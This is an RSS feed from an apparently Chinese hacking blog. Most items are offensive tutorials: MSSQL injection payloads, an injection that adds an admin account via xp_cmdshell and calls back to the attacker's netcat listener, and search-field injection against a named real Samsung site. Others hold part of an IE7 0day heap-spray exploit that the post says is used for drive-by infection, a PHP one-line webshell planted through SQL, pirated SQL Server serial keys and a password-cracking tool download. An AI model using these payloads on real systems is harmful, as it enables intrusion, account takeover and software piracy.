<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:wfw="http://wellformedweb.org/CommentAPI/">
  <channel>
    <title><![CDATA[大胆's blog]]></title> 
    <link>http://www.xkww.com/</link> 
    <description><![CDATA[大胆's blog,  www.xkww.com www.dadan.net.cn]]></description> 
    <language>zh</language> 
    <copyright><![CDATA[Copyright 2010, 大胆's blog]]></copyright> 
    <webMaster><![CDATA[hackdirl@gmail.com (大胆)]]></webMaster> 
    <generator>LBS v2.0.313</generator> 
    <pubDate>Thu, 11 Mar 2010 04:40:01 +0800</pubDate> 
    <ttl>60</ttl>
  
    <item>
      <title><![CDATA[大胆md5算法密码加密解密工具v2.0发布！]]></title> 
      <link><![CDATA[http://www.xkww.com/article.asp?id=234]]></link> 
      <category><![CDATA[个人原创]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Sat, 06 Jun 2009 18:11:36 +0800</pubDate> 
      <description><![CDATA[好意思让大家老催我！最近心烦！发布就延期了。。 <br />2.0主要是优化了密码的破解线程问题。 <br />降低了资源耗费。 <br />优点依旧破解纯数字速度飞快！ <br />我私人问题解决完我发布特别版哈！有打算公布源代码。。 <br /><br /><div style="width: 100%;overflow-x : auto;"><a href="http://www.xkww.com/uploads/200906/06_181210_.jpg" target="_blank"><img src="http://www.xkww.com/uploads/200906/06_181210_.jpg" alt="http://www.xkww.com/uploads/200906/06_181210_.jpg" /></a></div><br /><br /><a href="http://www.xkww.com/20.rar" title="http://www.xkww.com/20.rar" target="_blank">http://www.xkww.com/20.rar</a>  下载地址]]></description>
      <wfw:commentRss><![CDATA[http://www.xkww.com/feed.asp?q=comment&id=234]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[Mssql2005数据库注入方法整理总结]]></title> 
      <link><![CDATA[http://www.xkww.com/article.asp?id=233]]></link> 
      <category><![CDATA[攻击技术]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Thu, 23 Apr 2009 13:04:18 +0800</pubDate> 
      <description><![CDATA[/**/跟空格的作用一样，有的时候可以过一些过滤<br /><br />爆库语句，修改红色部分的数字挨个猜出库<br />/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--<br /><br />爆表语句,somedb部份是所要列的数据库，红色数字1累加<br />/**/and/**/(select/**/top/**/1/**/cast(name/**/as]]></description>
      <wfw:commentRss><![CDATA[http://www.xkww.com/feed.asp?q=comment&id=233]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[寡人南下行程已经确定！爱卿们准备迎驾吧！]]></title> 
      <link><![CDATA[http://www.xkww.com/article.asp?id=232]]></link> 
      <category><![CDATA[个人原创]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Mon, 16 Feb 2009 21:47:00 +0800</pubDate> 
      <description><![CDATA[总体就是4月要到广州。先去上海4天然后海宁苏州杭州最后南京飞大连。目的地广州。迎驾吧]]></description>
      <wfw:commentRss><![CDATA[http://www.xkww.com/feed.asp?q=comment&id=232]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[让你快速学会Cookie与联合查询的注入]]></title> 
      <link><![CDATA[http://www.xkww.com/article.asp?id=231]]></link> 
      <category><![CDATA[攻击技术]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Tue, 23 Dec 2008 22:05:24 +0800</pubDate> 
      <description><![CDATA[具体的原理与分析过程我就不写了，写起来一大片，大家看的心烦我写的头痛，我就讲操作过程中的细节。隐私报告里设置处需要接受所有的cookie将安全降低。<br />具体的原理与分析过程我就不写了，写起来一大片，大家看的心烦我写的头痛，我就讲操作过程中的细节。隐私报告里设置处需要接受所有的cookie将安全降低。<br />cookie值是连接后才保存到本机的，也就是关IE后.<br />前提条件：一、网站没有过滤cookie方式的注入。<br />二、需事前了解数据库的管理员表段名，计算一下注入文件数据库查询语句在数据库中的列数。<br />打开数据库,找到Product这个表名，计算字段数为21个。管理员表名为admin 用户与密码字段名为username、password，呵呵没有注入文件，我们可以自己构造一个测试方便大家的理解。<br />构造如下简单注入ASP，当然我没作什么严格的过滤，也就是接受任何方式的提交。.<br />&lt;!--#include ]]></description>
      <wfw:commentRss><![CDATA[http://www.xkww.com/feed.asp?q=comment&id=231]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[注入得到数据库返回IP]]></title> 
      <link><![CDATA[http://www.xkww.com/article.asp?id=230]]></link> 
      <category><![CDATA[攻击技术]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Tue, 23 Dec 2008 22:05:01 +0800</pubDate> 
      <description><![CDATA[and 1=(select * from openrowset(&amp;#39;sqloledb&amp;#39;,&amp;#39;server=127.0.0.1,5200;uid=Name;pwd=Pass&amp;#39;,&amp;#39;select user;exec master.dbo.xp_cmdshell [net user admin admin /add]&amp;#39;))--//通常注入时。。WEB和SQL分离 想得到对方SQL服务器IP看看有没开放WEB 用以上语句能取得 然后辈分个小马上去得到WEBSHELL 前提是SQL服务器能上网并且能外连。。 <br />　　本地NC 监听一个端口 上面语句中的IP端口改为自己监听的。。]]></description>
      <wfw:commentRss><![CDATA[http://www.xkww.com/feed.asp?q=comment&id=230]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[ASPX搜索型注入]]></title> 
      <link><![CDATA[http://www.xkww.com/article.asp?id=229]]></link> 
      <category><![CDATA[攻击技术]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Tue, 23 Dec 2008 22:04:23 +0800</pubDate> 
      <description><![CDATA[今天看到有个关于搜索型注入的文章，用到的是一种新技术，探测的是三星：<a href="http://notebook.samsung.com.cn/index.aspx" title="http://notebook.samsung.com.cn/index.aspx" target="_blank">http://notebook.samsung.com.cn/index.aspx</a> <br />　　注入方式是：<br /><br />　　一般网站的搜索都是部分匹配的<br /><br />　　有漏洞的url是<a href="http://notebook.samsung.com.cn/news/news.aspx&amp;" title="http://notebook.samsung.com.cn/news/news.aspx&amp;" target="_blank">http://notebook.samsung.com.cn/news/news.aspx&amp;</a> ... t&amp;ST=title&amp;SC=<br /><br />　　构造注入语句 三星%’and 1=1 and ’%’=’<br /><br />　　三星%’and 1=2 and ’%’=’<br /><br />　　大家看到了吧 两个返回页面是不一样的 说明有注入的漏洞 特征字 写 笔记本 就是三星%’and 1=1 and ’%’=’ 返回时有的<br /><br />　　我们知道一般搜索代码是这么写的：<br /><br />　　Select * from 表名 where 字段 like ’%关键字%’<br /><br />　　这样就造成了对关键字前后的所有匹配(%是用来全部匹配的)<br />]]></description>
      <wfw:commentRss><![CDATA[http://www.xkww.com/feed.asp?q=comment&id=229]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[IE7 0day漏洞分析]]></title> 
      <link><![CDATA[http://www.xkww.com/article.asp?id=228]]></link> 
      <category><![CDATA[漏洞公布]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Fri, 12 Dec 2008 10:58:12 +0800</pubDate> 
      <description><![CDATA[昨天不小心看到knownsec安全团队发的文章，所以就想看看到底是怎么造成的。<br />这两天这个IE7的0day挺热的，我也凑凑热闹，说实话，不怎么会javascript，所以分析也挺费劲的，<br />但是大体知道是个怎么回事触发这个漏洞的了<br /><br />0day代码片断<br />if(wxp||w2k3)document.write(&#39;&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;image SRC=http://&amp;#114;&amp;#2570;&amp;#114;.book.com src=http://www.google.com]]&gt;&lt;![CDATA[&gt;]]&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;XML ID=I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;&#39;);<br /><br />关键触发是由于这个Image SRC的字段的数据造成的<br />]]></description>
      <wfw:commentRss><![CDATA[http://www.xkww.com/feed.asp?q=comment&id=228]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[IE7漏洞0day!挂马已经被利用]]></title> 
      <link><![CDATA[http://www.xkww.com/article.asp?id=227]]></link> 
      <category><![CDATA[漏洞公布]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Wed, 10 Dec 2008 10:14:15 +0800</pubDate> 
      <description><![CDATA[好吧。被人发出来了。上周末还有人5000一小马。甚至一开始有12W出售的。<br /><br />湛江那边更新了发出来了。我也发给吧。。。不分析。上代码。<br /><br />360补完还是中的~<br /><br />&lt;script language=&quot;javascript&quot;&gt;<br />if(navigator.userAgent.toLowerCase().indexOf(&quot;msie 7&quot;)==-1)location.replace(&quot;about:blank&quot;); <br />function sleep(milliseconds)<br />{<br />var start=new Date().getTime();<br /> <br />for(var i=0;i&lt;1e7;i++)<br />{if((new Date().getTime()-start)&gt;milliseconds)<br />{break}<br />}<br />}<br /><br />function spray(sc)<br />{<br />var infect=unescape(sc.replace(/dadong/g,&quot;\x25\x75&quot;));<br />]]></description>
      <wfw:commentRss><![CDATA[http://www.xkww.com/feed.asp?q=comment&id=227]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[PHPCMS2008 后台拿shell]]></title> 
      <link><![CDATA[http://www.xkww.com/article.asp?id=226]]></link> 
      <category><![CDATA[攻击技术]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Fri, 21 Nov 2008 15:19:22 +0800</pubDate> 
      <description><![CDATA[进去后<br />Create TABLE b (cmd text NOT NULL);           <br />Insert INTO b (cmd) VALUES(&#39;&lt;?php @eval($_POST[cmd]);?&gt;&#39;);   <br />//在字段cmd中插入一句话木马，木马内容为&lt;?php @eval($_POST[cmd]);?&gt;<br />前3句都尅执行成功最后一句执行后显示空白<br />select cmd from b into outfile &#39;E:\wwwroot\phpcms\phpcms\shell.php&#39;;]]></description>
      <wfw:commentRss><![CDATA[http://www.xkww.com/feed.asp?q=comment&id=226]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[Microsoft SQL Server 2000 序列号]]></title> 
      <link><![CDATA[http://www.xkww.com/article.asp?id=225]]></link> 
      <category><![CDATA[工具资源]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Tue, 11 Nov 2008 10:21:57 +0800</pubDate> 
      <description><![CDATA[H6TWQ-TQQM8-HXJYG-D69F7-R84VM<br />R7MPM-R36DT-F38FC-RPPCX-XJG7M<br />KRJQ8-RQ822-YRMXF-6TTXC-HD2VM<br />RBDC9-VTRC8-D7972-J97JY-PRVMG]]></description>
      <wfw:commentRss><![CDATA[http://www.xkww.com/feed.asp?q=comment&id=225]]></wfw:commentRss>
    </item>
      
  </channel>
</rss>
